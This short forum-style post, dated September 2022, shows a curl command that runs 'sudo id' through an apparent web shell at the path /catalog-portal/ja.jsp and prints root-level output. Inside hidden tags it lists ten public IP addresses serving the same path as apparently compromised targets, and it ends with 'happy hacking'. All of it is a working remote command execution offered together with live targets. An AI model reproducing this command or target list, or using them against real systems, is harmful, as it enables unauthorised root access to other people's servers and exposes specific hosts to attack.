September 27, 2022 at 11:13 PM
$curl -k https://x.x.x.x/catalog-portal/ja.jsp?cmd=sudo+id
Command: sudo id[hide]https://46.218.127.177/catalog-portal/ja.jsphttps://103.43.229.63/catalog-portal/ja.jsphttps://103.11.115.172/catalog-portal/ja.jsphttps://185.31.56.169/catalog-portal/ja.jsphttps://198.57.31.67/catalog-portal/ja.jsphttps://201.220.29.70/catalog-portal/ja.jsphttps://119.160.92.20/catalog-portal/ja.jsphttps://58.246.38.28/catalog-portal/ja.jsphttps://193.189.120.145/catalog-portal/ja.jsphttps://196.204.81.244/catalog-portal/ja.jsp[/hide]happy hacking
uid=0(root) gid=0(root) groups=0(root),1002(vami),1005(sshaccess)
